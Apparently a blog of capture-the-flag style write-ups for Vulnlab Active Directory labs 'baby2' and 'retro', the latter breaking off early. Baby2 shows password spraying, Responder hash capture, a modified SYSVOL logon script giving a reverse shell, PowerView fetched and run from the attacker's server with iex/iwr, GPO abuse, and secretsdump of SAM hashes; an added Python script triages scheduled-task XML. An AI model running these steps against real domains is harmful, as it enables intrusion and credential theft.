nt authority\system

c:\Users\Administrator\Desktop>hostname
hostname
BREACHDC


 

.

 

 

vulnlab – baby2

Baby2 is a medium Windows machine on Vulnlab

https://wiki.vulnlab.com/intro/lab-access

Tools used : kerbrute_linux , crackmapexec , responder , smbclient , bloodhound-python , pygpoabuse.py , evil-winrm , impacket-secretsdump

After the nmap scan, we add to our /etc/hosts

110.10.107.115 dc.baby2.vl baby2.vl

SMB enumeration

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ ./kerbrute_linux_386 userenum -d baby2.vl --dc 10.10.107.115 ./users.txt -v

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 06/05/24 - Ronnie Flathers @ropnop

2024/06/05 10:51:32 >  Using KDC(s):
2024/06/05 10:51:32 >  	10.10.107.115:88

2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Joan.Jennings@baby2.vl
2024/06/05 10:51:32 >  [!] library        @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Mohammed.Harris@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Kieran.Mitchell@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Harry.Shaw@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Amelia.Griffiths@baby2.vl
2024/06/05 10:51:32 >  [+] VALID USERNAME:	 Carl.Moore@baby2.vl
2024/06/05 10:51:32 >  [!] Joel.Hurst   @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [!] Nicola.Lamb    @baby2.vl - User does not exist
2024/06/05 10:51:32 >  [!] Lynda.Bailey   @baby2.vl - User does not exist
2024/06/05 10:51:33 >  [+] VALID USERNAME:	 Ryan.Jenkins@baby2.vl
2024/06/05 10:51:33 >  Done! Tested 11 usernames (7 valid) in 0.046 seconds

.

 

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ crackmapexec smb baby2.vl -u 'users.txt' -p 'users.txt'  --no-bruteforce --continue-on-success
SMB         dc.baby2.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Amelia.Griffiths:Amelia.Griffiths STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\Carl.Moore:Carl.Moore 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Harry.Shaw:Harry.Shaw STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Joan.Jennings:Joan.Jennings STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Joel.Hurst:Joel.Hurst STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Kieran.Mitchell:Kieran.Mitchell STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\library:library 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Lynda.Bailey:Lynda.Bailey STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Mohammed.Harris:Mohammed.Harris STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Nicola.Lamb:Nicola.Lamb STATUS_LOGON_FAILURE 
SMB         dc.baby2.vl     445    DC               [-] baby2.vl\Ryan.Jenkins:Ryan.Jenkins STATUS_LOGON_FAILURE 

.

                                                                    
┌──(puck㉿kali)-[~/vulnlab/baby2]
sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.4.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

--snip--

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.8.2.138]
    Responder IPv6             [fe80::649e:d175:8068:bcd1]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP', 'ISATAP.LOCAL']

[+] Current Session Variables:
    Responder Machine Name     [WIN-4JOEGPTIY13]
    Responder Domain Name      [VHTD.LOCAL]
    Responder DCE-RPC Port     [45034]

[+] Listening for events...

[SMB] NTLMv1-SSP Client   : 10.10.107.115
[SMB] NTLMv1-SSP Username : BABY2\Amelia.Griffiths
[SMB] NTLMv1-SSP Hash     : Amelia.Griffiths::BABY2:209A2B76B00AD43400000000000000000000000000000000:3396018DE3FBCDC60DDC06D5C83119BA2C907D2EE4041103:fe87a8a485cea873
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths
[*] Skipping previously captured hash for BABY2\Amelia.Griffiths

.

Download login.vbs, modify it, and then upload it back

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ smbclient //baby2.vl/SYSVOL -U Carl.Moore
Password for [WORKGROUP\Carl.Moore]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Tue Aug 22 19:37:36 2023
  ..                                  D        0  Tue Aug 22 19:37:36 2023
  baby2.vl                           Dr        0  Tue Aug 22 19:37:36 2023

        6126847 blocks of size 4096. 1960515 blocks available
smb: \> cd baby2.vl
smb: \baby2.vl\> ls
  .                                   D        0  Tue Aug 22 19:43:55 2023
  ..                                  D        0  Tue Aug 22 19:37:36 2023
  DfsrPrivate                      DHSr        0  Tue Aug 22 19:43:55 2023
  Policies                            D        0  Tue Aug 22 19:37:41 2023
  scripts                             D        0  Tue Aug 22 21:28:27 2023

        6126847 blocks of size 4096. 1960512 blocks available
smb: \baby2.vl\> cd scripts
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A      992  Sat Sep  2 16:55:51 2023

        6126847 blocks of size 4096. 1960216 blocks available
smb: \baby2.vl\scripts\> get login.vbs
getting file \baby2.vl\scripts\login.vbs of size 992 as login.vbs (6.5 KiloBytes/sec) (average 6.5 KiloBytes/sec)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A      992  Sat Sep  2 16:55:51 2023

        6126847 blocks of size 4096. 1980334 blocks available
smb: \baby2.vl\scripts\> put login.vbs
putting file login.vbs as \baby2.vl\scripts\login.vbs (19.4 kb/s) (average 19.4 kb/s)
smb: \baby2.vl\scripts\> ls
  .                                   D        0  Tue Aug 22 21:28:27 2023
  ..                                  D        0  Tue Aug 22 19:43:55 2023
  login.vbs                           A     1190  Thu Jun  6 10:42:19 2024

        6126847 blocks of size 4096. 1980332 blocks available
smb: \baby2.vl\scripts\>

.

.

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ bloodhound-python -d 'baby2.vl' -u 'library' -p 'library' -c all -ns 10.10.97.10 
INFO: Found AD domain: baby2.vl
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.baby2.vl
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.baby2.vl
INFO: Found 16 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.baby2.vl
INFO: Done in 00M 06S

.

Catch the shell

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ python3 -m http.server 
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.121.13 - - [06/Jun/2024 10:42:58] "GET /Invoke-ConPtyShell.ps1 HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:53:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -
10.10.121.13 - - [06/Jun/2024 10:54:49] "GET /nc.exe HTTP/1.1" 200 -

.

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.2.138] from (UNKNOWN) [10.10.121.13] 54867
Microsoft Windows [Version 10.0.20348.1906]
(c) Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
baby2\amelia.griffiths

C:\Windows\system32>cd c:\temp
cd c:\temp

c:\temp>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is E6F3-2485

 Directory of c:\temp

06/06/2024  01:53 AM    <DIR>          .
06/06/2024  01:53 AM            45,272 nc.exe
               1 File(s)         45,272 bytes
               1 Dir(s)   8,262,537,216 bytes free

c:\temp>powershell                                                     
powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Install the latest PowerShell for new features and improvements! https://aka.ms/PSWindows

PS C:\temp> iex (iwr -usebasicparsing http://10.8.2.138:8000/PowerView.ps1)

PS C:\temp> add-domainobjectacl -rights "all" -targetidentity "gpoadm" -principalidentity "Amelia.Griffiths"

PS C:\temp> $cred = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

PS C:\temp> set-domainuserpassword gpoadm -accountpassword $cred

PS C:\temp> 

Check that the new password works:

┌──(puck㉿kali)-[~/vulnlab/baby2]
└─$ crackmapexec smb baby2.vl -u 'gpoadm' -p 'Password123!'  --no-bruteforce --continue-on-success 
SMB         dc.baby2.vl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:baby2.vl) (signing:True) (SMBv1:False)
SMB         dc.baby2.vl     445    DC               [+] baby2.vl\gpoadm:Password123! 
                                                                                
┌──(puck㉿kali)-[~/vulnlab/baby2]

.

With pyGPOAbuse we can add an immediate scheduled task to a GPO that gpoadm can write to. The task runs as SYSTEM on every machine the GPO applies to once Group Policy refreshes (or after gpupdate /force), so we use it to add gpoadm to the local Administrators group. The tool needs the GPO GUID; the one used below, 31B2F340-016D-11D2-945F-00C04FB984F9, is the well-known GUID of the Default Domain Policy. For this I had to use a Python virtual environment, as some dependencies caused problems with the installed version of impacket.

.

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ git clone https://github.com/Hackndo/pyGPOAbuse.git
Cloning into 'pyGPOAbuse'

┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ python3 -m venv venv

┌──(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ source venv/bin/activate

┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ ls
assets  LICENSE  pygpoabuse  pygpoabuse.py  README.md  requirements.txt  venv

┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ pip3 install -r requirements.txt
Collecting msldap (from -r requirements.txt (line 1))
┌──(venv)─(puck㉿kali)-[~/vulnhub/baby2/pyGPOAbuse]
└─$ python3 pygpoabuse.py 'baby2.vl/gpoadm:Password123!' -gpo-id 31B2F340-016D-11D2-945F-00C04FB984F9 -f -dc-ip 10.10.71.85 -command 'net localgroup administrators /add gpoadm' 
SUCCESS:root:ScheduledTask TASK_60bdad92 created!
[+] ScheduledTask TASK_60bdad92 created!

After the policy refresh, gpoadm is a member of the local Administrators group on the DC:

PS C:\temp> net user gpoadm
net user gpoadm
User name gpoadm
Full Name gpoadm
Comment 
User's comment 
Country/region code 000 (System Default)
Account active Yes
Account expires Never

Password last set 6/6/2024 7:16:03 AM
Password expires Never
Password changeable 6/7/2024 7:16:03 AM
Password required Yes
User may change password Yes

Workstations allowed All
Logon script 
User profile 
Home directory 
Last logon Never

Logon hours allowed All

Local Group Memberships *Administrators 
Global Group memberships *Domain Users 
The command completed successfully.

PS C:\temp>


┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ evil-winrm -i baby2.vl -u 'gpoadm' -p 'Password123!' 

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\gpoadm\Documents> whoami
baby2\gpoadm
*Evil-WinRM* PS C:\Users\gpoadm\Documents>

.

Beyond root

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ impacket-secretsdump baby2.vl/gpoadm:'Password123!'@10.10.74.17

Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x34170b414576a40142e3edc4911d859d
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:<REDACTED>:::

*Evil-WinRM* PS C:\Users\Administrator\Documents> net user administrator Password123!
The command completed successfully.

┌──(puck㉿kali)-[~/vulnhub/baby2]
└─$ xfreerdp /v:10.10.74.17 -sec-nla

.

The scheduled task behind the initial shell: it re-runs every minute after Amelia.Griffiths logs on, with her interactive token, and executes a PowerShell script that in turn runs login.vbs from the SYSVOL scripts share. That is why editing login.vbs in SYSVOL gave code execution as her.

c:\windows\system32\tasks\logonsim

<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Date>2023-08-22T12:48:15.1312495</Date>
    <Author>BABY2\Administrator</Author>
    <URI>\logonsim</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Repetition>
        <Interval>PT1M</Interval>
        <StopAtDurationEnd>false</StopAtDurationEnd>
      </Repetition>
      <Enabled>true</Enabled>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <Delay>PT2M</Delay>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>
    <AllowHardTerminate>true</AllowHardTerminate>
    <StartWhenAvailable>true</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabled>
    <Hidden>false</Hidden>
    <RunOnlyIfIdle>false</RunOnlyIfIdle>
    <WakeToRun>false</WakeToRun>
    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
    <Priority>7</Priority>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>\windows\logon.ps1</Arguments>
    </Exec>
  </Actions>
</Task>

c:\windows\login.ps1

cscript //X \\baby2.vl\SYSVOL\baby2.vl\scripts\login.vbs
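As an added example (not part of the original writeup), the following script does the triage an analyst would do on a task definition like the one above: it parses the Task Scheduler XML, reports the principal, trigger and command, and lists the points that matter for lateral movement. TASK_XML is the logonsim task from this writeup, trimmed to the elements the parser reads and without the UTF-16 declaration (real task files should be opened in binary mode so ET.parse can honour it); the SCRIPT_HOSTS list is my own choice.

```python
"""Triage a Windows Task Scheduler XML definition (added example, not from the writeup)."""
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Interpreters that turn a task into "run whatever this script file says" (my own list).
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe", "cmd.exe", "mshta.exe"}

# The logonsim task quoted in the writeup, trimmed to the elements read below.
TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo>
    <Author>BABY2\Administrator</Author>
    <URI>\logonsim</URI>
  </RegistrationInfo>
  <Triggers>
    <LogonTrigger>
      <Repetition><Interval>PT1M</Interval></Repetition>
      <Enabled>true</Enabled>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <Delay>PT2M</Delay>
    </LogonTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>LeastPrivilege</RunLevel>
      <UserId>BABY2\Amelia.Griffiths</UserId>
      <LogonType>InteractiveToken</LogonType>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Command>
      <Arguments>\windows\logon.ps1</Arguments>
    </Exec>
  </Actions>
</Task>"""


def parse_task(xml_text):
    """Return the parts of a task definition an analyst looks at first."""
    root = ET.fromstring(xml_text)

    def text(path):
        return (root.findtext(path, default="", namespaces=NS) or "").strip()

    triggers = []
    trig_root = root.find("t:Triggers", NS)
    if trig_root is not None:
        for trig in trig_root:
            triggers.append({
                "type": trig.tag.split("}", 1)[1],  # e.g. LogonTrigger, TimeTrigger
                "user": (trig.findtext("t:UserId", default="", namespaces=NS) or "").strip(),
                "repeat": (trig.findtext("t:Repetition/t:Interval", default="", namespaces=NS) or "").strip(),
            })

    actions = [{
        "command": (ex.findtext("t:Command", default="", namespaces=NS) or "").strip(),
        "arguments": (ex.findtext("t:Arguments", default="", namespaces=NS) or "").strip(),
    } for ex in root.iterfind("t:Actions/t:Exec", NS)]

    return {
        "uri": text("t:RegistrationInfo/t:URI"),
        "author": text("t:RegistrationInfo/t:Author"),
        "run_as": text("t:Principals/t:Principal/t:UserId"),
        "run_level": text("t:Principals/t:Principal/t:RunLevel"),
        "logon_type": text("t:Principals/t:Principal/t:LogonType"),
        "triggers": triggers,
        "actions": actions,
    }


def review(task):
    """Points worth a second look: what the task can do, how often, and with whose token."""
    notes = []
    for a in task["actions"]:
        exe = a["command"].lower().rsplit("\\", 1)[-1]
        if exe in SCRIPT_HOSTS:
            notes.append(f"{exe} executes {a['arguments']!r}; whoever can write that script runs code as the task principal")
    for t in task["triggers"]:
        if t["type"] == "LogonTrigger" and t["repeat"]:
            notes.append(f"re-runs every {t['repeat']} after logon of {t['user'] or 'any user'}")
    if task["logon_type"] == "InteractiveToken":
        notes.append(f"runs with the interactive token of {task['run_as']} ({task['run_level']})")
    return notes


if __name__ == "__main__":
    task = parse_task(TASK_XML)
    print(f"{task['uri']} registered by {task['author']}, runs as {task['run_as']}")
    for note in review(task):
        print(" -", note)
```

On a real host, point parse_task at the contents of C:\Windows\System32\Tasks\<name> (read as bytes); the same checks apply to tasks created by GPO immediate-task abuse such as the one pyGPOAbuse wrote above, except that those run as SYSTEM.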

.

vulnlab-retro

vulnlab-retro

Let’s start with an Nmap scan.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ cat ports_retro.txt                                       
# Nmap 7.94SVN scan initiated Mon Jun  3 18:51:15 2024 as: nmap -Pn -sC -sV -oN ports_retro.txt 10.10.95.159
Nmap scan report for 10.10.95.159
Host is up (0.019s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-06-03 16:51:25Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: retro.vl0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC.retro.vl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.retro.vl
| Not valid before: 2023-07-23T21:06:31
|_Not valid after:  2024-07-22T21:06:31
|_ssl-date: TLS randomness does not represent time
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-06-03T16:52:44+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: RETRO
|   NetBIOS_Domain_Name: RETRO
|   NetBIOS_Computer_Name: DC
|   DNS_Domain_Name: retro.vl
|   DNS_Computer_Name: DC.retro.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2024-06-03T16:52:04+00:00
| ssl-cert: Subject: commonName=DC.retro.vl
| Not valid before: 2024-06-02T16:49:49
|_Not valid after:  2024-12-02T16:49:49
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb2-time: 
|   date: 2024-06-03T16:52:06
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun  3 18:52:46 2024 -- 1 IP address (1 host up) scanned in 91.24 seconds
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

.

LDAP enum

➜  retro ldapsearch -x -H ldap://retro.vl -s base namingContexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingContexts 
#

#
dn:
namingContexts: DC=retro,DC=vl
namingContexts: CN=Configuration,DC=retro,DC=vl
namingContexts: CN=Schema,CN=Configuration,DC=retro,DC=vl
namingContexts: DC=DomainDnsZones,DC=retro,DC=vl
namingContexts: DC=ForestDnsZones,DC=retro,DC=vl

Try an anonymous (null) bind:

➜  retro ldapsearch -x -H ldap://retro.vl -s sub -b 'DC=retro,DC=vl'
# extended LDIF
#
# LDAPv3
# base <DC=retro,DC=vl> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090AC9, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4f7c

# numResponses: 1

Anonymous binds are not allowed; we need credentials for LDAP.

.

SMB

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON                        Logon server share 
SMB         dc.retro.nl     445    DC               Notes                           
SMB         dc.retro.nl     445    DC               SYSVOL                          Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ impacket-smbclient guest@retro -no-pass
Impacket v0.11.0 - Copyright 2023 Fortra

Type help for list of commands
# use Trainees
# ls
drw-rw-rw-          0  Mon Jul 24 00:16:11 2023 .
drw-rw-rw-          0  Wed Jul 26 11:54:14 2023 ..
-rw-rw-rw-        288  Mon Jul 24 00:16:11 2023 Important.txt
# cat important.txt
Dear Trainees,

I know that some of you seemed to struggle with remembering strong and unique passwords.
So we decided to bundle every one of you up into one account.
Stop bothering us. Please. We have other stuff to do than resetting your password every day.

Regards

The Admins

RID-Brute

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'guest' -p '' --rid-brute 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\guest: 
SMB         dc.retro.nl     445    DC               [+] Brute forcing RIDs
SMB         dc.retro.nl     445    DC               498: RETRO\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               500: RETRO\Administrator (SidTypeUser)
SMB         dc.retro.nl     445    DC               501: RETRO\Guest (SidTypeUser)
SMB         dc.retro.nl     445    DC               502: RETRO\krbtgt (SidTypeUser)
SMB         dc.retro.nl     445    DC               512: RETRO\Domain Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               513: RETRO\Domain Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               514: RETRO\Domain Guests (SidTypeGroup)
SMB         dc.retro.nl     445    DC               515: RETRO\Domain Computers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               516: RETRO\Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               517: RETRO\Cert Publishers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               518: RETRO\Schema Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               519: RETRO\Enterprise Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               520: RETRO\Group Policy Creator Owners (SidTypeGroup)
SMB         dc.retro.nl     445    DC               521: RETRO\Read-only Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               522: RETRO\Cloneable Domain Controllers (SidTypeGroup)
SMB         dc.retro.nl     445    DC               525: RETRO\Protected Users (SidTypeGroup)
SMB         dc.retro.nl     445    DC               526: RETRO\Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               527: RETRO\Enterprise Key Admins (SidTypeGroup)
SMB         dc.retro.nl     445    DC               553: RETRO\RAS and IAS Servers (SidTypeAlias)
SMB         dc.retro.nl     445    DC               571: RETRO\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               572: RETRO\Denied RODC Password Replication Group (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1000: RETRO\DC$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1101: RETRO\DnsAdmins (SidTypeAlias)
SMB         dc.retro.nl     445    DC               1102: RETRO\DnsUpdateProxy (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1104: RETRO\trainee (SidTypeUser)
SMB         dc.retro.nl     445    DC               1106: RETRO\BANKING$ (SidTypeUser)
SMB         dc.retro.nl     445    DC               1107: RETRO\jburley (SidTypeUser)
SMB         dc.retro.nl     445    DC               1108: RETRO\HelpDesk (SidTypeGroup)
SMB         dc.retro.nl     445    DC               1109: RETRO\tblack (SidTypeUser)
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

Simple check: the note says the trainees share one account, so try the username as password.

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee'            
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]

Enumerate the shares again with the trainee credentials:

┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ crackmapexec smb retro.vl -u 'trainee' -p 'trainee' --shares 
SMB         dc.retro.nl     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:retro.vl) (signing:True) (SMBv1:False)
SMB         dc.retro.nl     445    DC               [+] retro.vl\trainee:trainee 
SMB         dc.retro.nl     445    DC               [+] Enumerated shares
SMB         dc.retro.nl     445    DC               Share           Permissions     Remark
SMB         dc.retro.nl     445    DC               -----           -----------     ------
SMB         dc.retro.nl     445    DC               ADMIN$                          Remote Admin
SMB         dc.retro.nl     445    DC               C$                              Default share
SMB         dc.retro.nl     445    DC               IPC$            READ            Remote IPC
SMB         dc.retro.nl     445    DC               NETLOGON        READ            Logon server share 
SMB         dc.retro.nl     445    DC               Notes           READ            
SMB         dc.retro.nl     445    DC               SYSVOL          READ            Logon server share 
SMB         dc.retro.nl     445    DC               Trainees        READ            
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/retro]
└─$ impacket-smbclient trainee:trainee@retro.vl
